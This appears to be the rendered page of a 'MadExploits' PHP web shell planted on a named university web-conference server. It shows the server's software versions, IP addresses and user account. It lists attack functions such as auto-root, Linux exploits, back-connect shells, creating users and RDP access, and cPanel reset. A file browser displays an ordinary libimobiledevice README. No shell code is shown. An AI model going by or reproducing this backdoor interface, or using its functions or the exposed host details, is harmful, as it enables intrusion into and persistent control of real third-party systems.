Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.145.174.57
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libimobiledevice6 /
[ HOME SHELL ]
Name
Size
Permission
Action
AUTHORS
294
B
-rw-r--r--
NEWS.Debian.gz
276
B
-rw-r--r--
NEWS.gz
6.49
KB
-rw-r--r--
README.md
1.52
KB
-rw-r--r--
changelog.Debian.gz
1.67
KB
-rw-r--r--
copyright
6.28
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# libimobiledevice ## About A library to communicate with services of Apple iOS devices using native protocols. ## Requirements Development Packages of: * OpenSSL or GnuTLS * libplist * libusbmuxd Software: * usbmuxd (OSS or Apple's version) * make * autoheader * automake * autoconf * libtool * pkg-config * gcc or clang Optional: * cython (Python bindings) * doxygen (Documentation) ## Installation To compile run: ```bash ./autogen.sh make sudo make install ``` If you require a custom prefix or other option being passed to `./configure` you can pass them directly to `./autogen.sh` like this: ```bash ./autogen.sh --prefix=/opt/local --enable-debug-code make sudo make install ``` By default, OpenSSL will be used. If you prefer GnuTLS, configure with `--disable-openssl` like this: ```bash ./autogen.sh --disable-openssl ``` ## Who/What/Where? * Home: https://www.libimobiledevice.org/ * Code: `git clone https://git.libimobiledevice.org/libimobiledevice.git` * Code (Mirror): `git clone https://github.com/libimobiledevice/libimobiledevice.git` * Tickets: https://github.com/libimobiledevice/libimobiledevice/issues * Mailing List: https://lists.libimobiledevice.org/mailman/listinfo/libimobiledevice-devel * IRC: irc://irc.freenode.net#libimobiledevice * Twitter: https://twitter.com/libimobiledev ## Credits Apple, iPhone, iPod, and iPod Touch are trademarks of Apple Inc. libimobiledevice is an independent software library and has not been authorized, sponsored, or otherwise approved by Apple Inc. README Updated on: 2019-06-21
Close